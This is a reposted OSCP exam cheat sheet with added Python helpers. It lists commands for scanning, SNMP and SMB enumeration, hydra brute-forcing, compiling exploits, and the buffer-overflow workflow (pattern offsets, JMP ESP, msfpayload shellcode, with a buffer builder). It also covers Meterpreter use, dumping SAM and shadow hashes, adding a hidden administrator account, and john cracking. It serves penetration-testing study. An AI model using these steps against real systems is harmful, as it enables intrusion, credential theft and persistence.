OSCP Cheat Sheet

Thanks to Ash for posting this up over on his blog; I put it here for quick reference and for others to benefit from. Check out his blog over at http://security.crudtastic.com for more info and inside scoops on the OSCP. Original post: http://security.crudtastic.com/?p=213

Notes
Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.
A nice OSCP cheat sheet | www.n1tr0g3n.com/?p=3869 | 12/30/12
Scan network for live hosts (nmap/zenmap)
For NMAP:
nmap -PN 192.168.9.200-254 (-PN, now spelled -Pn, skips host discovery and port-scans every address in the range, so the output also shows the open ports for each host; for a ping sweep only, use -sP, now spelled -sn)
Identify OS (nmap/zenmap)
For NMAP:
nmap -O 192.168.0.100 (just OS fingerprint)
nmap -A 192.168.9.201 (runs an "aggressive" scan: port scan, OS fingerprint, version scan, default scripts and traceroute)
Check hosts for services (nmap/zenmap)
For NMAP:
nmap -sS 192.168.9.254 (TCP SYN scan)
nmap -sU 192.168.9.254 (UDP; slow, and ports that never answer are reported open|filtered rather than open)
(Could be better to do this in zenmap and group servers by services)
For SNMP:
snmpwalk -c public -v1 192.168.9.254 1 | grep hrSWRunName | cut -d" " -f (the field number after -f is missing in the original; the hrSWRunName lines look like HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "init" and list every process running on the host)
For SMB:
nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep the grepable output for 445/open to pick out the hosts with SMB reachable)
./samrdump.py 192.168.9.201 (Impacket's samrdump, on my machine in /root/offsec; run it against the hosts found above to enumerate user accounts over MSRPC/SAMR)
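Parsing the grepable output, as an added example that is not part of Ash's cheat sheet: the -oG file from the SMB scan above is parsed into hosts per open port (the "then grep open" step) and grouped by service, which is what grouping servers by services in zenmap gives you, plus the list of version strings to look up later. The sample scan output is constructed to match nmap's "Host: ... Ports: ..." line shape; the hosts, services and version strings in it are made up.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output in the shape nmap writes:
#   Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ...
# This is NOT output from a real scan; hosts, services and versions are made up.
# (nmap writes '|' in place of '/' inside service and version strings, so the
# slash split below is safe.)
SAMPLE_GREPABLE = """\
# Nmap 5.21 scan initiated Sun Dec 30 10:00:00 2012 as: nmap -sT -sV -p 22,80,445 -oG smb_results.txt 192.168.9.200-254
Host: 192.168.9.201 ()\tStatus: Up
Host: 192.168.9.201 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (2 ports)
Host: 192.168.9.202 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, 80/open/tcp//http//Apache httpd 2.2.8/, 445/closed/tcp//microsoft-ds///
Host: 192.168.9.203 ()\tPorts: 445/filtered/tcp//microsoft-ds///
Host: 192.168.9.204 ()\tPorts: 445/open/tcp//microsoft-ds///, 80/open/tcp//http//Microsoft IIS httpd 6.0/
# Nmap done at Sun Dec 30 10:00:05 2012 -- 55 IP addresses (4 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+(.*)$")


def parse_grepable(text):
    """Yield (host, port, proto, state, service, version) for every port entry."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and "Status: Up" lines carry no ports
        host, ports_field = m.groups()
        # The Ports: field ends at the next tab-separated field (e.g. "Ignored State:")
        ports_field = ports_field.split("\t")[0]
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            yield host, int(port), proto, state, service, version


def hosts_with_open_port(text, port, proto="tcp"):
    """Hosts on which the given port is reported open (the 'grep open' step)."""
    return sorted({h for h, p, pr, st, _s, _v in parse_grepable(text)
                   if p == port and pr == proto and st == "open"})


def group_by_service(text):
    """Map 'port/proto' -> sorted hosts with it open, to pick targets per service."""
    groups = defaultdict(set)
    for host, port, proto, state, _service, _version in parse_grepable(text):
        if state == "open":
            groups[f"{port}/{proto}"].add(host)
    return {k: sorted(v) for k, v in sorted(groups.items())}


def versions_for_lookup(text):
    """(host, port, service, version) for open ports that reported a version:
    the list to check against exploit-db / securityfocus."""
    return [(h, p, s, v) for h, p, _pr, st, s, v in parse_grepable(text)
            if st == "open" and v]


if __name__ == "__main__":
    print("SMB hosts:", hosts_with_open_port(SAMPLE_GREPABLE, 445))
    for svc, hosts in group_by_service(SAMPLE_GREPABLE).items():
        print(svc, hosts)
    for row in versions_for_lookup(SAMPLE_GREPABLE):
        print("look up:", row)
```

Swap SAMPLE_GREPABLE for `open("smb_results.txt").read()` to run it over a real scan; the parser only relies on the Host/Ports line layout, not on which ports were scanned.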
POP3 – hydra -l <user> -P mil-dict.txt -f -V <target> pop3 (<user> and <target> are placeholders that were stripped from the original; may need -t 15 to limit concurrent connections)
SNMP – hydra -P mil-dict.txt -f -V <target> snmp (<target> is a placeholder; the word list is tried as community strings)
MS VPN – dos2unix words (whatever word list, so the lines end in \n only), then cat words | thc-pptp-bruter <VPN server> (reads the passwords from stdin)
Look for known vulnerable services (refer to the nmap/zenmap output)
Check versions of software (found by SNMP enumeration or the nmap/zenmap version scan) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
Compile exploit code if possible (milw0rm archive)
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits are written for compilation under Windows, others for Linux. Identify the environment by inspecting the headers:
cat exploit | grep "#include"
(windows.h / winsock2.h mean Windows; sys/socket.h, netinet/in.h or unistd.h mean Linux/Unix)
WINDOWS:
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe ability.c -lwsock32
wine ability.exe (to run the compiled file)
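Header-based triage, as an added example that is not from the original post: the grep "#include" check above turned into a small script that classifies an exploit source as Windows, Linux or portable and suggests the compile line the notes use. The three source snippets are constructed stand-ins, not real exploits, and the header sets are an assumption about which includes are platform-specific; extend them as you meet other headers.

```python
import re

# Constructed exploit-source snippets (not real exploits): only the #include
# lines matter for deciding where the code was written to be compiled.
WINDOWS_SRC = """\
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
int main(int argc, char **argv) { WSADATA w; WSAStartup(MAKEWORD(2, 2), &w); return 0; }
"""

LINUX_SRC = """\
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(int argc, char **argv) { int s = socket(AF_INET, SOCK_STREAM, 0); return s < 0; }
"""

PORTABLE_SRC = """\
#include <stdio.h>
#include <string.h>
int main(void) { char buf[64]; strcpy(buf, "x"); return 0; }
"""

INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]', re.MULTILINE)

# Assumed platform-specific headers; libc-only includes (stdio.h, string.h, ...)
# build on either side and are treated as portable.
WINDOWS_HEADERS = {"windows.h", "winsock.h", "winsock2.h", "ws2tcpip.h", "wininet.h"}
WINSOCK_HEADERS = {"winsock.h", "winsock2.h", "ws2tcpip.h"}
UNIX_HEADERS = {"unistd.h", "sys/socket.h", "netinet/in.h", "arpa/inet.h",
                "netdb.h", "sys/types.h", "sys/wait.h"}


def includes(src):
    """Header names pulled from every #include line (what `grep "#include"` shows)."""
    return INCLUDE_RE.findall(src)


def classify(src):
    """'windows', 'linux' or 'portable' based on the headers the source pulls in."""
    hdrs = set(includes(src))
    if hdrs & WINDOWS_HEADERS:
        return "windows"
    if hdrs & UNIX_HEADERS:
        return "linux"
    return "portable"


def compile_command(src, name):
    """Compile line in the style of the notes: MinGW gcc under wine for Windows
    sources (linking wsock32 when Winsock is used), plain gcc otherwise."""
    hdrs = set(includes(src))
    if classify(src) == "windows":
        cmd = f"wine gcc -o {name}.exe {name}.c"
        if hdrs & WINSOCK_HEADERS:
            cmd += " -lwsock32"  # Winsock calls need the socket library linked in
        return cmd
    return f"gcc -o {name} {name}.c"


if __name__ == "__main__":
    for label, src in (("ability", WINDOWS_SRC), ("sploit", LINUX_SRC), ("bof", PORTABLE_SRC)):
        print(label, classify(src), "->", compile_command(src, label))
```

Run it as `python3 triage.py` after pasting a real exploit into one of the string constants, or read the file from disk; a "portable" verdict means the headers alone do not decide it and you have to look at the code (MessageBox vs. fork, for instance).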
Wireshark Filters
To filter out all traffic for IP 192.168.0.100: !(ip.addr == 192.168.0.100)
(display-filter field names are lowercase; ip.addr matches the address as either source or destination)
FUZZING STEPS – ASH STYLE
1. Determine target application and operating system
2. Obtain a copy of the application
3. Analyse the RFC & communication protocols
4. Discover & record crash conditions
5. Analyse crash conditions for exploitation opportunities
Things we need to know:
Which 4 bytes overwrite EIP
Do we have enough space in the buffer for shellcode
Is this shellcode easily accessible in memory (is a register such as ESP pointing at it when EIP is overwritten)
Does the application filter out any characters (bad chars)
Will we encounter overflow protection mechanisms (DEP, ASLR, stack cookies)
(*** HANDY – framework3/tools -> nasm_shell.rb => type JMP ESP to get its opcode bytes, FF E4 ***)
Creating pattern for EIP location:
framework3/tools -> pattern_create.rb >> Fuzzing_script (will append to the end of the script) – then look in OllyDbg for the pattern bytes in EIP (need to reverse them, because the register is shown as a little-endian dword, and convert the hex to ASCII)
pattern_offset.rb – will show the byte offset of those 4 bytes in the pattern
Creating shellcode (in framework3):
./msfpayload | grep -i shell
./msfpayload …… o (for options)
./msfpayload …… c (to create, as a C-style byte array)
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **
CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
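The pattern and buffer-building steps above, as an added example in Python (not Ash's code and not Metasploit's): pattern_create / pattern_offset reimplemented, the reverse-and-convert step from OllyDbg's EIP value done with a little-endian unpack, and a buffer builder that refuses to emit a payload whose shellcode does not fit after EIP or contains a bad character. The crash length, the EIP value and the JMP ESP address in the __main__ block are hypothetical, and the shellcode is a stand-in of INT3 bytes; take the real values from the debugger and nasm_shell.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern in the pattern_create.rb style (Aa0Aa1Aa2...Aa9Ab0...).
    Every 3-byte group is unique, so any 4 bytes that land in EIP identify
    exactly one position in the buffer (max length 26*26*10*3 = 20280)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(fragment, length=20280):
    """Byte offset of a pattern fragment such as 'Aa5A' (pattern_offset.rb), or -1."""
    return pattern_create(length).find(fragment)


def offset_from_eip(eip_hex, length=20280):
    """Offset from the EIP value as OllyDbg prints it, e.g. '41356141'.
    The register holds a little-endian dword, so packing it with '<I' gives
    the bytes back in memory order ('Aa5A'): the reverse-and-convert step."""
    fragment = struct.pack("<I", int(eip_hex, 16)).decode("ascii")
    return pattern_offset(fragment, length)


def check_bad_chars(data, bad):
    """Bytes of data that the target is known to filter or truncate on."""
    return sorted({b for b in data if b in bad})


def build_buffer(offset, jmp_esp, shellcode, total_len, nop_sled=16, bad=frozenset({0x00})):
    """Final buffer: junk up to EIP, the JMP ESP address (little-endian), a
    NOP sled, then the shellcode, padded to the length that crashed the target.
    Raises when the shellcode plus sled does not fit in the space after EIP or
    when the shellcode contains a bad character."""
    space = total_len - offset - 4
    if len(shellcode) + nop_sled > space:
        raise ValueError(f"need {len(shellcode) + nop_sled} bytes after EIP, only {space} available")
    found = check_bad_chars(shellcode, bad)
    if found:
        raise ValueError(f"shellcode contains bad chars: {[hex(b) for b in found]}")
    buf = b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nop_sled + shellcode
    return buf + b"C" * (total_len - len(buf))


if __name__ == "__main__":
    crash_len = 1000                       # assumed size of the buffer that crashed the target
    print(pattern_create(crash_len)[:30])  # send this in place of the A's
    eip_seen = "41356141"                  # hypothetical EIP value read from OllyDbg
    off = offset_from_eip(eip_seen)
    print("EIP offset:", off)
    JMP_ESP = 0x11223344                   # hypothetical; use a real JMP ESP (FF E4) address from the target
    demo_shellcode = b"\xcc" * 32          # stand-in (INT3s), not real shellcode; replace with msfpayload output
    print(len(build_buffer(off, JMP_ESP, demo_shellcode, crash_len)), "byte buffer ready")
```

The NOP sled is there because the exact distance between ESP and the shellcode can shift by a few bytes between runs; the size check enforces the "take note of shellcode size" reminder above before anything is sent.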
Finding an exploit: cd /pentest/exploits/milw0rm, then grep -i <keyword> sploitlist.txt (<keyword> is a placeholder; the search term is missing in the original)
MSFCLI (p243)
./msfcli <exploit> <option=value ...> <mode>, where the mode letter appended at the end is O = show options, P = list payloads, T = list targets, E = execute the exploit
MSFCONSOLE
sessions -l => list created sessions
sessions -i # => interact with specific session number
show options
search <term>
use exploit/…..
set PAYLOAD ….
exploit
Meterpreter Payloads (p260)
payload = windows/meterpreter/reverse_tcp ….
meterpreter> help (lists all commands)
upload <local file> c:\\windows (the local file name is a placeholder stripped from the original; backslashes are doubled in meterpreter commands)
download c:\\windows\\repair\\sam /tmp
ps (running tasks)
execute -f cmd -c (creates a new channel with the cmd shell)
interact # (interacts with channel number #)
Other useful Windows commands
net user ash my_password /add
net localgroup administrators ash /add
Passwords & Hashes
Windows SAM => %systemroot%\repair (backup copy of the SAM; the live copy in %systemroot%\system32\config is locked while Windows runs, so on a running box use pwdump or fgdump instead, p340)
or use the framework's meterpreter shell => hashdump (written as gethashes in the original; hashdump is the meterpreter priv command that dumps the SAM hashes)
Linux => /etc/passwd & /etc/shadow
John The Ripper for Linux => unshadow the passwd & shadow files into another file, then crack that:
unshadow /etc/passwd /etc/shadow > hashes.txt
./john hashes.txt
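Merging passwd and shadow, as an added example that is not from the original post: an unshadow-style merge in Python plus a check of which accounts actually carry a crackable hash and of which crypt scheme, so you know what john will see before you run it. The passwd and shadow excerpts are constructed, and the hash strings are dummies of the right shape that do not correspond to any real password.

```python
# Constructed /etc/passwd and /etc/shadow excerpts (not from a real host).
# The hash strings are dummies in the right $id$salt$hash shape.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
ash:x:1000:1000:Ash,,,:/home/ash:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/sh
"""

SHADOW = """\
root:$6$saltsalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmn:15700:0:99999:7:::
daemon:*:15700:0:99999:7:::
ash:$1$abcdefgh$0123456789abcdefghijkl:15700:0:99999:7:::
backup:!:15700:0:99999:7:::
"""

# crypt(3) scheme by $id$ prefix; a 13-character field with no prefix is
# traditional DES crypt.
HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}


def parse_colon_file(text):
    """Lines of a colon-separated file as field lists, skipping blanks and comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def unshadow(passwd_text, shadow_text):
    """Merge passwd and shadow the way john's unshadow does: the 'x' in the
    passwd password field is replaced by the hash field from shadow."""
    shadow = {f[0]: f[1] for f in parse_colon_file(shadow_text) if len(f) >= 2}
    lines = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) >= 2 and fields[0] in shadow:
            fields[1] = shadow[fields[0]]
        lines.append(":".join(fields))
    return "\n".join(lines) + "\n"


def hash_type(pw):
    """Scheme name for a password field, or None when there is nothing to crack
    ('x' = still shadowed, '*' / '!' / '!!' = locked or no password)."""
    if not pw or pw in ("x", "*") or pw.startswith("!"):
        return None
    for prefix, name in HASH_PREFIXES.items():
        if pw.startswith(prefix):
            return name
    return "descrypt" if len(pw) == 13 and not pw.startswith("$") else "unknown"


def crackable_accounts(merged_text):
    """(user, scheme) for the accounts john will actually work on."""
    return [(f[0], hash_type(f[1])) for f in parse_colon_file(merged_text)
            if len(f) >= 2 and hash_type(f[1]) is not None]


if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)  # same result as: unshadow passwd shadow > hashes.txt
    print(merged)
    print(crackable_accounts(merged))  # then: ./john hashes.txt
```

Knowing the scheme up front matters for time budgeting: md5crypt is cheap to crack, sha512crypt is thousands of times slower per guess, and a list with only locked accounts is not worth loading into john at all.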
Copyright n1tr0g3n Industries . All Rights Reserved.